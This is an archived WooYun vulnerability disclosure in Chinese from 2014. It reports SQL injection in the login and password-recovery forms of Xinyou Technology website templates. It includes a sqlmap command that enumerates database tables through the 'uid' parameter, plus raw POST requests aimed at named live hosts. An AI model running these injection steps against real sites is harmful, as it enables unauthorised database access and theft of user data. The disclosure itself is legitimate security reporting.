乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-01-14: 细节已通知厂商并且等待厂商处理中 2014-01-19: 厂商已经主动忽略漏洞,细节向公众公开
信游科技各大模板多处SQL注入漏洞,所有模板,均存在相应漏洞
1.用户登录处未对用户名uid进行过滤,导致SQL注入为避免影响,以测试站点为例:
sqlmap.py -r "C:\1.txt" -p "uid" --tables
POST /api/remote/login.ashx?cid=0.16956438540776841 HTTP/1.1Host: xy003.52xinyou.cnUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0Accept: */*Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateDNT: 1Content-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestReferer: http://xy003.52xinyou.cn/index.htmlContent-Length: 28Cookie: xinyoukeji=2055191Connection: keep-alivePragma: no-cacheCache-Control: no-cacheuid=test&pwd=12345&rem=false
2.忘记密码处,用户账户同样存在这个问题
POST /api/webaction.ashx HTTP/1.1Host: xy006.52xinyou.cnUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateDNT: 1Referer: http://xy006.52xinyou.cn/user/findpass.htmlConnection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 152posttype=find_pwd1&username=1&findtype=email&find_qus=%E4%BD%A0%E7%88%B6%E4%BA%B2%E7%9A%84%E5%90%8D%E5%AD%97&find_answer=&button2=%E6%8F%90+%E4%BA%A4
快修复!!
危害等级:无影响厂商忽略
忽略时间:2014-01-19 17:00
暂无